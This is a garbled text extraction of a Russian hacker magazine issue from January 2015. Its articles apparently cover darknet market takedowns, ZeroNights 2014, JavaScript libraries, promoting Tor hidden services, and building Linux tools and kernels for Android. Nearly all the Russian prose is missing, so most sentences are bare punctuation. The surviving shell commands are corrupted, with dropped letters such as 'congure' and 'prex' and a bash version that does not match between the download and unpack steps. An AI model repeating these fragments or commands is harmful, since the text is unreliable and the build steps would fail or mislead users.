Хакер 2015 01

192
Eiffel
. 36
. 90
450
Android 5.0

Varnish
. 114
Cover Story
ZERO
NIGHTS

2014
. 12
01 (192)
: 25.12.2014

rusanen@real.xakep.ru

chernova@real.xakep.ru

PC ZONE, UNITS
ilembitov@real.xakep.ru
ant
ant@real.xakep.ru

UNIXOID SYN/ACK
kruglov@real.xakep.ru
goltsev@real.xakep.ru

X-MOBILE
execbit.ru
Dr.
MALWARE, ,
PHREAKING
alexander@real.xakep.ru

-
, , , 16
. , , .
192 , ,
, .
, .
-. .
, . .
, - , - , - .
,
, .
, , , , ][-. , , ][
.
, ZN, , ,
. -, . , , ,
, .
!
ZN, , , .
ZN , ,
, PR, , , , . ZN
,
. ,
, , .
, ,
, , ZN, ][
!
DVD
ant

ant@real.xakep.ru
D1g1
Security-
evdokimovds@gmail.com

PR-
yakovleva.a@glc.ru

samsonenko@glc.ru

shop.glc.ru, info@glc.ru, (495) 663-82-77, (800) 200-3999 ( , , )

(lapina@glc.ru)
: , 109147, / 50
: claim@glc.ru. : 115280, , . , . 19, . : : 606400, ., -, . , .,

. 13. : , 614111, , . , . , . 26.
, (), 77-56756 29.01.2014 . Scanweb, PL 116, Korjalankatu 27, 45101
Kouvola, . 96 500 . 450 .
. . , , .
. : content@glc.ru. , , 2015
Stay tuned, stay ][!

,
][
@IlyaRusanen
16+
2015
192
004 MEGANEWS
012 ZERONIGHTS 2014:
020
022 Firefox Developer Edition
024 SEO
028 Linux- Android
036 security- Android 5.0
042 #3.
044 EASY HACK
048
054 IPMI/BMC-
058 ?
060
066 X-TOOLS C
068 2014 ,
076 2014 ][
082 R
086 MBAAS
090 , , Boeing
096 Sails.js MVC-
102 Rake
106 Parallels
108 , , !
114
- Varnish
120 , SIP-
125 , Linux11
130 ESPER
135 Apache Tomcat UNIX-
140 FAQ
144 WWW2 -
MEGANEWS
Silk Road
2.0 26-
(aka
Defcon). Silk Road
2.0
,

,
.

Silk Road 2.0
.
Mifrill
mifrill@real.xakep.ru

Silk Road
ONYMOUS,
, Silk Road,
Silk Road 2.0.
Silk Road
,
Onymous.
Onymous
. ,
Tor. , Silk Road 2.0
, Cloud 9,
Hydra, Pandora, Blue Sky, Topix, Flugsvamp, Cannabis
Road Black Market,
, , . ,

Tor-,
. , : Cash Machine,
Cash Flow, Golden Nugget, Fast Cash .
, Bitcoin 250 . , , , , .
, , : ? ,
Tor.
, , .
, ,
Onymous
. ,
. ,
. ,
, ,
Silk Road
2.0. ,
.
414 .onion
.
17 .
01 /192/ 2015

, APPLE
,
,
, iPhone, . , ,
.
Palo Alto Networks , 400 Mac, iPhone iPad , WireLurker.

iCloud . WireLurker Maiyadi ( ). , , Apple, .
, ,
.
, WireLurker .
,
Enterprise.
. , ,
: (,
).
OS X ( Yosemite).
Rootpipe
. , Apple
, .
,
15
.
.
Mail.Ru, eBaza ,

,
. 9,6
mail.ru, 2,5 yandex.ru 1,1 rambler.ru.

list.ru, bk.ru, narod.ru
yahoo.com. , , 100% -.
. , Mail.Ru ,
,
,

0,2% . ,
,
- 200
. , 98,8%
, .

.

.

. ,
,
. ,
!, ,
.

MEGANEWS
01 /192/ 2015
BADUSB

USB-
,
SR Labs ,
USB ? ,
,
.
(github.com/
adamcaudill/Psychson), .
(
: opensource.srlabs.de/projects/badusb), USB-
: Phison, Alcor, Renesas, ASmedia, Genesys
Logic, FTDI, Cypress Microchip. ,
PacSec. ,
, , .
, , . ,
, ,
.
, Phison . ASmedia,
, . Genesys USB 3.0, USB 2.0. ,
, , ,
.
, BadUSB
,
USB- ( )

.

,

.
86%
WordPress
WordPress 3.x, ,
.
,

JavaScript-, . WordPress 4.0
,
WordPress 4.0.1. 3.9.3, 3.8.5 3.7.5.
44%

, Google+
. ,
,
-, .
,
- Google,

Dropbox

451 Research.
, Dropbox
,
Dropbox
1000 , OneDrive. ,
18%
,
.
01 /192/ 2015

, BITCOIN-
,
. , ,
,
,
. Bitcoin
, . ,
,
BC .
, ,
,
( ).

.
CryptoLabs ,
,
. Case. (86 54 )
, .
Case SIM-, 60 .
, ,
, .
multi-signature, -
,
. .
. , ,
. Case
, . , ,
, : , ,
E Ink , .

. Mr.Bitcoin
, ,
.
,
, NFC-
(RFID- NTAG216,
NFC Type 2). :
.
- .
, Case

BC-.
Trezor. Trezor
, ,
,
. Case .

,

NFC-
(RFID-
NTAG216,
NFC Type 2)

?
Microsoft ,
Windows 10.
,
, , , ?
20
18
-3 :
48
43

Windows Store

Windows 8/8.1
17
15
, -

20

Cortana
13
MEGANEWS
01 /192/ 2015
,
,

GOOGLE NO-CAPTCHA

FIREFOX

GOOGLE
FIREFOX ,
Mozilla Firefox . , Firefox 1.0 10 2004 , .

Firefox 33.1 , . , Forget (),
, .
Google, 2004
. , Firefox . , Mozilla,
Google (
90% ). . ,
Yahoo, , Baidu.
Google, Bing, DuckDuckGo, eBay, Amazon, Twitter
Wikipedia. Google, DuckDuckGo, OZON.ru, Price.ru, Mail.Ru Wikipedia. .
, ,
: (
), ,
?. , .
Google No-CAPTCHA,
ReCAPTCHA. Snapchat, WordPress
HumbleBundle, .
, No-CAPTCHA , , .

, , IP- , , .
, ,
- . ,
,
. ,
. Google .
2014
Google ( )
2014 . 75 , 11 . ,
2013 .
, Facebook Messenger, WhatsApp,
Hike Twitter. .
, :
Lamoda
LinguaLeo
-
Anywayanyday

Delivery Club

Aviasales
Telegram
01 /192/ 2015
2016 Samsung Apple (

Samsung 80%
). Samsung
2014 - Apple,
.
NOKIA

.
Super Mario Brothers, Call
of Duty.
( )
5
140 .
Z LAUNCHER
Nokia
Microsoft, . Nokia
Nokia
N1 Android 5.0. , Nokia

2016 . .
iPad Mini, Nokia , , N1
, iPad, . : , IPS- 7,9 (2048 1536)
Gorilla Glass 3. N1 Intel Atom Z3580 2 (LPDDR3). - (eMMC 5.0) 32 . , 8 5 ,
5300 Wolfson WM8958E. , N1
micro-USB 2.0 Type-C .
250 .
. Nokia Z Launcher.
, :
, ( ).
Nokia .
,
. , . , , .
... . , , .
, Z Launcher , , , .
, . .
Z Launcher -,
Nexus 5, Galaxy
S5, S4, S3, Moto X,
Moto G, HTC One, Sony
Xperia Z1.

.

zlauncher.com.
Sandisk
SSD-DIMM, -,

. UltraDIMM
DDR3.
Google -
OS X
, Santa.
inhouse,

. Microsoft
:).
10
01 /192/ 2015

, Facebook
,
, ,

.
$400

TWITTER FACEBOOK
: .
,
.
Facebook Twitter, , : , .
Twitter .
, . ? :
Twitter . . .
Facebook . 1 , . Facebook
( , ) , . , ,
, , , ( ).
. ? , .
. ,

AAA-.
Minecraft ,
.

Bitcoin

BC

319
. ,
, Silk Road 2.0, ,
, , . . ,
, 400 . ,
,
BC :).
15 000
Facebook

Facebook

2014 .

(4960 ), (1893), (1773). , ,
29 .

, ,
, , . ,
15 , 3 ,

.
11
01 /192/ 2015
Google Play
Services ,
Google
Copresence,
iOS
Android. ,

Bluetooth Wi-Fi.
Raspberry Pi Model B+,

,
Model A. , : Raspberry Pi Model
A+ .
, : -, ,
,
. .
Model A+ :
86 65 . 23 . - Broadcomm BCM2385 ARM11
700 , 256 HDMI. , ,
. Model A+ USB (, Model B+ ), 40-
GPIO microSD. , 20 .
, , , (,
). ,
. ,
IMP Ubuntu . IMP
( 200 ), :
(11 11 ) Odroid U3 HardKernel, ARM Cortex-V9 1,7 , 2 16
. 20 Wireless HDMI, 20
. Ubuntu 14.04 LTS , IMP
,
.
,
IMP ,
34%

(33 799 100 000
).

,

,

.

Microsoft:
Microsoft Office iOS Android
.
Office 365 .
WhatsApp
end-to-end .

Cryptocat, Silent
Text Telegram, WhatsApp , .

: Microsoft
Xbox ,
, APU
20- .
APU 28-
.
Cover Story
12
01 /192/ 2015
ZERONIGHTS
2014:


. .
.
, - Security
Vacation Club. DSec, , .

ZeroNights,

. , ,
, ,

. Digital Security, ZN, .
ZN .
, , mobile web securiry, defensive-
(
, ,
ZN).
. ZN-
, ,
,
afterparties
:).

ZN2014 ,
. ,
ZN
, ,
, ,
. Go on!
01 /192/ 2015
ZeroNights 2014:
13
Cover Story
14
ZN
,

- /
Jean-Philippe (JP) Aumasson
:

Kudelski Security.
ZeroNights 2014:
Heartbleed, OpenSSL, LibreSSL Truecrypt,

, Crypto
Coding Standard.
- / Jake McGinty
: Open Whisper
Systems.
ZeroNights 2014: , - ,
,

, ,
.

: Kudelski
Security, .
ZeroNights 2014:
Workshop,
,
;
DES; AES.
? ,
. ,
ZeroNights ,
. : , , ,
. ,
. , . ,
, , - .
, .
. ,
, , , . , ,
, , . , , , . ,
, . , ,
. , , .
, ,
Hardware Village, ,
, , . , . , - , ,
Hardware Village . , , Hardware Village
, . ,
! , !
01 /192/ 2015
15
ZeroNights 2014:
Web-security
/ Nicolas Gregoire
:
.
ZeroNights 2014: , 25
.

: Wallarm,
][.
ZeroNights 2014:

-,

, .
, ][
. . : ZeroNights
. ,
, . : , .
, .
fast tracks ( 15-
) , , ,
, , .
ZN .
, , , , ][. ,
, ,
, 2014-
:).
, - . ZN
.
: .

:
bug bounty ,
][ , ,

Xakep.RU :).
ZeroNights 2014: ,

. , -
,
,
, ( ,
) .
16
Cover Story
01 /192/ 2015
, DSec,
X-Tools
Mobile security
/ Peter Hlavaty
/ Marco Grassi
: KEEN Team, ][.

ZeroNights 2014: root- Android
,
,

.
: R&D
viaForensics.
ZeroNights 2014:
.

Android iOS, ,

.
,

: , ][.
ZeroNights 2014:
,
4G-
. : SIM-, 4G
USB-, , IP- .

: viaForensics, ][.
ZeroNights 2014: Workshop
, forensics iOS.
,
.
ZeroNights
, .
ZeroNights, -

.
, ,

ZeroNights. , ,
,
. , ,
.
.
,
, ,
,

, ,
, ZeroNights.
,
:). , , ,

DEFCON Russia
.
P. S. : ZeroNights?
:
!
01 /192/ 2015
17
ZeroNights 2014:
//
/ Patroklos Argyroudis (argp)
, , ][
ZeroNights .
-
-, . , -
, , , :).
, , : , , CTF, , .
, - .
. ,

, . , - 0day-
Heartbleed ,
- .
, ,
proof of concept, .
,
- :
, .
, , , , ZN.
QIWI,
. , ,
QIWI- ,
:). ,
, ,

VISA ZN.
, , ZeroNights
. ,
. Digital
Security, , The Prodigy One Love Hackers (1995).
, ,
.
: Census S.A.
ZeroNights 2014: Heapbleed,
( ,
, / , )
, ,
.

:
.
ZeroNights 2014:
, , ,
.
/ Fabien Duchene
: ,
.
ZeroNights 2014: , ShiftMonkey KameleonFuzz, , .

: Digital Security.
ZeroNights 2014:
AV, hardware assisted (VT-x,
AMD-V) .

: , ][.
ZeroNights 2014: ,
,
.
:
ZeroNights?
:
!
Cover Story
18
01 /192/ 2015
, ESAGE Lab,

, ZeroNights 2013,
,
.
( ), , .
, .
:
.
.
. , CTF-,
open source
- .
QIWI, , , .
,
.
:).
. , @toxo4ka
bug bounty , .
( ) , @akochkov
- radare2 ( ),
. , private speaker party, ,
, ,
.
, @090h DJ-,
Hardware Village, , . ,
:).
, , ,
, , ,
.
Fast track

: Digital
Security, ][.
ZeroNights 2014:
Oracle, Oracle Database
Communication Protocol .

: Positive Technologies,
][.
ZeroNights 2014:

. , ,

,
. , ,
.

: -

(Esage Lab), ][,
.
ZeroNights 2014: Go ,

Go (-, ,
)
.
, Positive Technologies,

ZN . ,
ZN,
, .
.
. -
. - ,
: bit.ly/1tQGXoh. ,
, . , ,
, , , .
,
. Hardware Village, .
, .
, . CTF, ,
. afterparty .
, , . .
01 /192/ 2015
19
ZeroNights 2014:
, - ,
Wallarm
, , ZeroNights ,
. ZN , !
: , , (, , ) Black Hat, , :). ,
ZN,
.
, , Keynote. , ,
. Solar Designer , DOS, ( ) , , .
- , , , . . , -
Foursquare ZN, ?
:
, , ,
-
Black Hat, , :)
, PR- DSec
ZeroNights, , .
, ,
, , .
: ,
, , , .
ZN , , . . , : , ,
, CTF -.
, .
, , , , . ,
Defensive Track, - . , .
, 12 , , .
, CTF,
.
Shadow servants, 1336 h4x0rz, ,
.
for fun, , . (). , ,
. , , ZeroNights :).
, Wallarm
. ZN . , . MQ ,
DOS-. DEFCON,
( ,
). 20052006,
:).
! - . . - . .
Defensive Track

: QIWI.
ZeroNights 2014:
. NGFW
DPI .

: Mail.Ru Group.
ZeroNights 2014:
,
,
, .

: Nokia R&N, Here,
][.
ZeroNights 2014: , ModSecurity

Web ,
.

:
.
ZeroNights 2014:
open source .
20
PC ZONE
01 /192/ 2015

@ilya_pestov

,

, . GitHub
,
.
,
.

io.js
ClockPicker
https://github.com/iojs/io.js
JavaScript , : Node.js,
Joyent,
io.js.
, Node.js 2013 ( 0.10)
V8.
semver. Io.js

4000 GitHub.
13 2015
, , Node.js npm.
https://github.com/weareoutman/clockpicker
UI/UX-, datetime-picker.
hours-

, . .
Handsontable
<div class="input-group clockpicker">

<input type="text" class=
"form-control" value="09:30">
<span class="input-group-addon">
<span class="glyphicon
glyphicon-time"></span>
</span>
</div>
<script type="text/javascript">
$('.clockpicker').clockpicker();
</script>
ClockPicker jQuery.
https://github.com/handsontable/handsontable
,
Excel- .

, ,
Handsontable. API,
.
50
.
c Backbone, Angular, , ,
.
01 /192/ 2015
21
Clappr
Mermaid
https://github.com/globocom/clappr
Clappr . Clappr : ,
,
Google-. Clappr
.
https://github.com/knsv/mermaid
-. Mermaid
JavaScript-, -:
<body>
<div id="player"></div>
<script>
var playerEl = document.
getElementById("player");
var player = new Clappr.
Player({source: "http://your.video/
Front-end Job Interview

Questions
https://github.com/h5bp/Front-end-DeveloperInterview-Questions
.
HTML5 Boilerplate
- ,
HTML, CSS, JS .
,
, ,
.
here.mp4"});
player.attachTo(playerEl);
</script>
</body>
Nightrain
https://github.com/naetech/nightrain
PHP,
- . ,
OS , Windows Linux.
, nightrain ,
. Python
PHP/HTML/CSS/JS .
SQLite 3. , , , .
,
-.
<div class="mermaid">
CHART DEFINITION GOES HERE
</div>
graph LR;
A[Hard edge]-->|
Link text|B(Round edge);
B-->C{Decision};
C-->|One|D[Result one];
C-->|Two|E[Result two];
(. ).
Flexie
https://github.com/doctyper/flexie
W3C , .
.
. Flexie
,
CSS3 Flexible Box Model IE 6-9, Opera
10.0+, Firefox 3.0+, Safari 3.2+ Chrome 5.0+.
PhotoSwipe
https://github.com/dimsemenov/PhotoSwipe

. 3000
. PhotoSwipe HTML5 History API
, , , .
var pswpElement = document.

querySelectorAll('.pswp')[0];
// build items array
var items = [
{
src: 'https://placekitte.com/600/400',
w: 600,
h: 400
},
{
src: 'https://placekitten.
com/1200/900',
w: 1200,
h: 900
}
SVG Morpheus
];
// dene options (if needed)
var options = {
// optionName: 'option value'
for example:
index: 0
// start at rst slide
};
// Initializes and opens PhotoSwipe
var gallery = new PhotoSwipe
( pswpElement, PhotoSwipeUI_Default,
items, options);
gallery.init();
https://github.com/alexk111/SVG-Morpheus
C retina- SVG -
SVG . SVG
Morpheus ,
SVG-. .
22
PC ZONE
01 /192/ 2015

@ilya_pestov
FIREFOX DEVELOPER EDITION
Mozilla
. -, Firefox.
, Mozillian,
, Internet Explorer 95% . -, Chrome
SpiderMonkey V8 Google. -,
, , Firefox Developer Edition.
Firefox Developer Edition Firefox Aurora, Firefox
Nightly. :
Nightly Developer Edition Beta Release.
12 , . ,
Firefox.
JavaScript-
SpiderMonkey Mozilla
Google V8

Google

.

.

.
:
,
cookie, ,

, .
FIREFOX HELLO
, ,
WebRTC, ,
.
,
Telefonica
Firefox . Skype Firefox Hello.
,
browsing data

FFDE WebRTC
01 /192/ 2015
23

-,

. , ,
Firefox Chrome
- DevTools,
.
, ,
, , -
. , . Firefox
.
JavaScript.
-,
,
- DOM before after.
.
CSS-
.

.
Scratchpad JavaScript .
online- offline.
.
WEBIDE
VALENCE
WebIDE - ( ) Firefox 33, Developer

Edition. WebIDE, , ,
Firefox OS
Firefox OS. , , .

.
Firefox Tools
Adapter. Valence ,
(, Chrome
Android, Safari iOS) -, Firefox.

FFOS
WEB AUDIO EDITOR
, . , ,
Firefox Developer
Edition. , , ...
Mozilla - ? ,
. Its everything youre
used to, only better. .
.
.
Web Audio API .
Web Audio Editor
FFDE
PC ZONE
24
01 /192/ 2015
SEO
ff333xx

. ,

,
.
aquapix@shutterstock.com
WARNING
01 /192/ 2015
25
SEO
- 1999
Ozon Mail? Tor .
. . .
90-, , , ,
.
.
, -
( - ):
;
;
.
Tor . .
WWW

Tor Browser:
https://www.torproject.
org
PC ZONE
26
01 /192/ 2015
ONION-
tor-hidden- , :
1. Tor (https://www.torproject.org/download/download-easy.html.en).
2. -. . , ,
XAMPP Windows (sourceforge.net/projects/xampp/) MAMPP (www.mamp.
info/en/) OS X.
3. . :
Windows (https://www.torproject.org/docs/tor-doc-windows.html.en);
OS X (https://www.torproject.org/docs/tor-doc-osx.html.en);
Linux (https://www.torproject.org/docs/tor-doc-unix.html.en).
-,

( ).
:

. ,
,

AgoraMarket.

. ,

.

, , . Tor , . . -,
NoScript Tor
Browser.
JavaScript, .
-, , HTML5 <canvas>,
Canvas Fingerprint (
, ).
canvas- Tor
.
, , . , .
-, Tor cookies,
.
, Firefox.
HTML-
(. ][ ), .
- ,
https://hacks.mozilla.org.
WWW

Tor
Browser
:
https://www.torproject.
org/projects/torbrowser/
design/
01 /192/ 2015
27
SEO

, , SEO:
, . Tor- -

2000-,
.

,
WWW
.
The Hidden Wiki:
.
http://kpvzxxbbraaigawj.
:
onion
1. Tor . Onion wiki:

http://cu7yjdxqw37yjv5n.
, onion/Main_Page
,
Grams
, .
Google drugs 431 ,
Tor- .
, .
Tor- ,
. Tor-.
2. -
, , Tor-
,
. . ,
( ),
description.
. Torch
, 12
. .
SEO- .
. ,
,
. - ,
,
, ,
, -
.

.
.
Grams (http://grams7enufi7jmdl.onion/
addasite);
TorFind (http://ndj6p3asftxboa7j.onion/
submit.html);
Ahmia (https://ahmia.fi/add/).
INFO
.
Google- Tor - .

-
open source
AWStats (www.awstats.org)
Piwik (piwik.org).
INFO

.onion, .i2p.
.

. , , , .
Torch (http://xmh57jrzrnw6insl.onion/
adinfo.html);
TorAds Grams (http://toradsc6vvmtugty.onion/
auth/home).
.
, .
Stay tuned!
X-Mobile
01 /192/ 2015

rommanio@yandex.ru

LINUX- ANDROID
Android-, , Linux. , Terminal IDE, ,
. ?
PureSolution@shutterstock.com
28
01 /192/ 2015
29
, Android Linux.
, , . .
Native- Android ( ),
. . .
,
( NTFS, ), .
(
Android 4.3, Google. . .).
, , , , ,
.
, , Linux- .
linux-x86_64/bin:${HOME}/linaro-toolchain-4.6/bin
export NDKPATH=${HOME}/android-ndk-r10c export
ANDROID_SYSROOT=${HOME}/android-ndk-r10c/
platforms/android-18/arch-arm
export LINARO_SYSROOT=${HOME}/linaro-tool
chain-4.6/arm-unknown-linux-gnueabi/
sysroot export ARCH=arm export
CROSS_COMPILE_NDK=arm-linuxandroideabi-export CROSS_
COMPILE_LINARO=arm-unknownlinux- gnueabi-export CROSS_

COMPILE=$CROSS_COMPILE_NDK_export
make
CCOMPILE=$CROSS_COMPILE
()
, - , ,
(
Ubuntu):
$ sudo apt-get install git-core gnupg

ex bison gperf build-essential
zip curl libc6-devlib32ncurses
5-dev x11proto-core-dev libx11
dev:i386 libreadline6dev:i36
libgl1-mesa-glx:i386 libgl1-mesa
dev g++-multilib mingw32openjdk
6-jdk tofrodos python-markdown
libxml2-utilsxsltproc zlib1g
dev:i386 git libtool
modules, , , ( net/netfilter
):
, .
$ make modules_prepare
,
.
$ make M=net/netlter CFLAGS_MODULE=
/proc/modules.
-fno-pic
, .
NDK Linaro,
,
.
( ,
target-
, ),
NDK ,
, ,
Android , ,
/system/lib/modules POSIX- insmod .
, Linaro
,
POSIX- ARM, (
.
Android
, , goo.gl/gIzvZe), ,

.
. https://developer.
android.com/tools/sdk/ndk/index.html , NDK, .
:
$ chmod u+x android-ndk-r10c-linux-x86_64.bin

$ ./android-ndk-r10c-linux-x86_64.bin

Linaro. forum.xdadevelopers.com/showthread.php?t=2098133 .
Linaro GCC 4.6.4-2013.05 ( Cortex, arm-unknown-linux-gnueabilinaro_4.6.4-2013.05-build_2013_05_18.tar.bz2).
:
$ tar xjvf arm-unknown-linux-gnueabilinaro_4.6.4-2013.05-build_2013_05_18.tar.bz2

$ mv arm-unknown-linux-gnueabilinaro_4.6.4-2013.05 linaro-toolchain-4.6
~/.bashrc (
, ,
, , ):
export PATH=$PATH:${HOME}/android-ndk-r10c/
toolchains/arm-linux-androideabi-4.6/prebuilt/
30
X-Mobile
( ) opensource.samsung.com.
. /proc/config.gz, ,
, ,
.
, ,
arch/arm/configs/, . n1a_00_
defconfig, .
, , :
01 /192/ 2015
$ make n1a_00_defcong

make menuconfig, .

,
.
,
,
$ make -j9 CFLAGS_MODULE=-fno-pic

:
$ mkdir nal
$ cp arch/arm/boot/zImage nal
$ nd . -name '*ko' -exec cp '{}' nal \;
, ,
ZIP-. ,
( . . .). :
$
$
$
$
cd nal
git clone https://github.com/koush/AnyKernel.git
cp ./*.ko ./AnyKernel/system/lib/modules/
cp ./zImage ./AnyKernel/kernel/
,
, ( ,
),
, d-h.st/RgI, , , AnyKernel/
kernel/. , , AnyKernel/META-INF/com/google/android/
updater-script.
:
ui_print("Extracting System Files...");

set_progress(1.000000);
mount("ext4","MTD", "system", "/system");
package_extract_dir("system", "/system");
unmount("/system");
01 /192/ 2015
31
. ,
, , , .
:
ui_print("Extracting Kernel les...");

package_extract_dir("kernel", "/tmp");
ui_print("Installing kernel...");
set_perm(0, 0, 0777, "/tmp/dump_image");
set_perm(0, 0, 0777, "/tmp/mkbootimg.sh");
set_perm(0, 0, 0777, "/tmp/mkbootimg");
set_perm(0, 0, 0777, "/tmp/unpackbootimg");
run_program("/sbin/busybox", "dd", "if=/dev/block/
mmcblk0p9", "of=/tmp/boot.img");
run_program("/tmp/unpackbootimg", "-i", "/tmp/
boot.img", "-o", "/tmp/");
run_program("/tmp/mkbootimg.sh");
run_program("/sbin/busybox", "dd", "if=/tmp/
newboot.img", "of=/dev/block/mmcblk0p9");
ui_print("Done!");
$
$
$
$
$
$
$
$
$
$
export CROSS_COMPILE=$CROSS_COMPILE_LINARO
export CC=arm-unknown-linux-gnueabi-gcc
export CPP=arm-unknown-linux-gnueabi-cpp
export CXX=arm-unknown-linux-gnueabi-g++
export LD=arm-unknown-linux-gnueabi-ld
export AS=arm-unknown-linux-gnueabi-as
export AR=arm-unknown-linux-gnueabi-ar
export RANLIB=arm-unknown-linux-gnueabi-ranlib
export CPPFLAGS="--sysroot=$LINARO_SYSROOT"
export CFLAGS="--static --sysroot
=$LINARO_SYSROOT"
$ export CXXFLAGS="--sysroot=$LINARO_SYSROOT"
$ export LDFLAGS="--sysroot=$LINARO_SYSROOT"
/dev/block/mmcblk0p9 ,
. boot,
. , :
Bash
$ for i in /dev/block/platform/*/by-name/boot; \
do ls -l $i; done
Bash Linaro c FTP :
$ wget http://ftp.gnu.org/gnu/bash/bash-4.3.30.tar.gz
$ tar xzvf bash-4.2.53.tar.gz && cd bash-4.3.30
$ cd AnyKernel && zip -r AnyKernel.zip *

(TWRP CWM).
configure :

, -
Bash,
Android
$ ./congure --host=arm-linux --enable-static

-link --without-bash-malloc --disable-rpath
--disable-nls
$ make
32
X-Mobile
bash,
/system/xbin.
, bash Linaro. Bionic, libc Android,
POSIX- , bash (, , mkfifo() wctomb()). ,
bash
. Linaro , , POSIX- glibc.
bash , ,
Android, , glibc, , . , .
Lshw
Lshw ,
. ( Linaro) .
,
src/Makefile src/core/Makefile C++
Linaro ( CXX
arm-unknown-linux-gnueabi-g++),
--static CXXFLAGS. .
Htop

Linux.
ncurses,
. htop,
ncurses:
$ mkdir htop && cd $_

$ wget http://ftp.gnu.org/pub/gnu/ncurses/
ncurses-5.9.tar.gz
01 /192/ 2015
Htop,
Android
$ tar xzvf ncurses-5.9.tar.gz

$ cd ncurses-5.9
$SYSROOT_ADDITIONS, configure :
$ export SYSROOT_ADDITIONS=${HOME}/htop/rootdir
$ ./congure --with-normal --without-shared
--without-cxx-binding --enable-root-environ
--disable-widec --disable-GPM --without-ada
--without-tests --host=arm-linux --prex=
$SYSROOT_ADDITIONS
$ make && make install

, (
Ada).
htop,
:
$ cd ..
$ wget http://hisham.hm/htop/releases/1.0.3/
htop-1.0.3.tar.gz
$ tar xzvf htop-1.0.3.tar.gz
$ cd htop-1.0.3
:
$ export CPPFLAGS="--sysroot=$LINARO_SYSROOT"
$ export CFLAGS="--static -I${SYSROOT_ADDITIONS}/
include --sysroot=$LINARO_SYSROOT"
$ export CXXFLAGS="--sysroot=$LINARO_SYSROOT"
$ export LDFLAGS="-L${SYSROOT_ADDITIONS}/
ncurses-5.9/lib --sysroot=$LINARO_SYSROOT"
$ export LIBS="${SYSROOT_ADDITIONS}/lib/
libncurses.a"
01 /192/ 2015
$ ./congure --host=arm --enable-static

--disable-unicode
$ make
,
Error opening terminal: screen. - terminfo
( Terminal IDE, , ), /system/etc :
# export TERMINFO=/system/etc/terminfo
htop .
Tmux
Tmux
screen,
OpenBSD. Android
adb shell SSH (,
TV Box HDMI- Android. .
.).
tmux
ncurses , rootdir. ncurses, libevent. tmux, $SYSROOT_ADDITIONS libevent tmux:
$ export SYSROOT_ADDITIONS=${HOME}/tmux/rootdir
$ git clone https://github.com/libevent/
libevent.git
$ git clone git://git.code.sf.net/p/tmux/tmux-code
libevent:
33
,
google,
ngrep
SSH-
Android.
tmux.

lshw
libpcap D-Bus
Android
34
X-Mobile
01 /192/ 2015
$ cd ../libevent
$ ./autogen.sh
$ ./congure --host=arm-linux --disableshared --disable-openssl --disable-samples
-prex=$SYSROOT_ADDITIONS
--sysroot=$LINARO_SYSROOT"
$ ./congure --enable-static --disable-dropprivs
--host=arm-linux --with-pcap-includes=
${SYSROOT_ADDITIONS}/include/pcap
$ make
configure. libpcap
D-Bus Android (
Linux, ). ngrep
libpcap /etc/passwd Android,
.
tmux:
$ export CFLAGS="--static-I
${SYSROOT_ADDITIONS}/include -I/${SYSROOT_
ADDITIONS}/include/ncurses --sysroot=
$LINARO_SYSROOT"
$ export LDFLAGS=" -L${SYSROOT_ADDITIONS}/
lib -L${SYSROOT_ADDITIONS}/include -L
${SYSROOT_ADDITIONS}/include/ncurses
LINUX DEPLOY

,
$ export LIBEVENT_CFLAGS="I${SYSROOT_ADDITIONS}
(, /include --sysroot=$LINARO_SYS torrent- rtorrent
ROOT"
libtorrent, ,
$ export LIBEVENT_LIBS="
,
L${SYSROOT_ADDITIONS}
Boost). -
/lib -levent
Android
,
ANDROID
POSIX- , ,
Linux. , :
SDL ; ;
FFmpeg - ;
Qt , Qt Android;
Unity ;
Ogre OpenGL
3D-.
.

$ ./congure --enable static --host=arm-linux &&
.
make
Linux Deploy,
Google Play.
tmux,
Android
TERMINFO,
Linux, TMPDIR
,
/data/local/tmp.
,
.
POSIX- (
# export TERMINFO=/system/
), etc/terminfo

# export TMPDIR=/data/
chroot- ( local/tmp
)
userland- , tmux
, ARM.
, Linux Deploy , .
loop-.
:
Ngrep
Ubuntu;
,
OpenSUSE;
( , ,
Fedora;
RESTful-). Arch Linux;
libpcap. , ,
Gentoo;
libpcap, :
, , Kali Linux ( , ,
).
,
tmux:
$ mkdir ngrep && cd $_

$ wget http://www.tcpdump.org/release/
libpcap-1.6.2.tar.gz
$ tar xzvf libpcap-1.6.2.tar.gz
$ cd libpcap-1.6.2
$ export SYSROOT_ADDITIONS=${HOME}/ngrep/
rootdir
$ ./congure --host=arm-linux --disable-shared
--with-pcap=linux --disable-dbus --prex=
$SYSROOT_ADDITIONS
ngrep, , :
$ export CFLAGS="--static -I${SYSROOT_ADDITIONS}

/include -I${SYSROOT_ADDITIONS}/include/pcap
$ export LDFLAGS=" -L${SYSROOT_ADDITIONS}/lib
-L${SYSROOT_ADDITIONS}/include -L
${SYSROOT_ADDITIONS}/include/pcap
: SSH VNC. SSH- Android Linux

Deploy ,
. VNC,
Android VNC- ( bVNC).

,
Linux, . , ,
. ,
, .
(
, )
Android. .
01 /192/ 2015
35
,
, , iptables.
,
.
POSIX-
NDK,
Bionic POSIX, ARM, , , glibc, . ,
, -

Ubuntu Linux Deploy
Ubuntu Linux Deploy

, ,
.

Linux Deploy, Android userland- .
. -,
, -, userland 4 , ,
, .
POSIX- Android .
- , .
Stay freedom.
X-Mobile
Art Hakker Photography@flicker.com
36
01 /192/ 2015
01 /192/ 2015
37
SECURITY-
ANDROID 5.0

androidstreet.net
Lollipop
Android Ice Cream Sandwitch.
Google
,
,

.

,

.
38
X-Mobile

Google Android .
Android ,
, ,
RPC- INFO
(Binder), ,

(dalvik) , ,
(James Comey)
(

).

iOS 8
. Google
Android 5.0, ,
OpenBSD
Bionic (
dmalloc calloc, Android 1.5),
No eXecute (NX) 2.3,

.
-fstack-protector Wformat-security
-Werror=format-security ( ).
3.0 ,
Linux- dm-crypt. Android 4.0
API
KeyChain,
.
4.1 ( )
HAL- keymaster
( , M-Shield OMAP4, Galaxy Nexus).
2012 Google
- Bouncer,

Google Play
, .
-

.
4.2,
2013-
Google Services
2.3 .
2014-
,
. SMS-
Android 4.2

.
Android 4.2

SELinux,
(permissive mode), 4.4
enforcing,

,
. 4.3
SETUID- -
01 /192/ 2015
/system
(capabilities) Linux .
Android Google

,
Apple
. ,
,
,
.
, Google , . Android
5.0 security specific ,
, , .
: ,
5.0, SELinux, root.

Apple, Android ,
iOS.
Lollipop, /data,
()
.
,
3.0
, :
(Master Key)

, PIN-
;
(Key Encryption Key, KEK)
,
Trusted Execution Environment (TEE),
, , Qualcomm
Secure Execution Environment.
,
, HAL masterkey,
TEE. ,

,
,
NAND.
,

,
PIN-
Smart
Lock ( ).
Google ,

,
, .

.
/data
dm-crypt AES-128 CBC ESSIV:SHA256
(IV).
KEK-,
PIN-
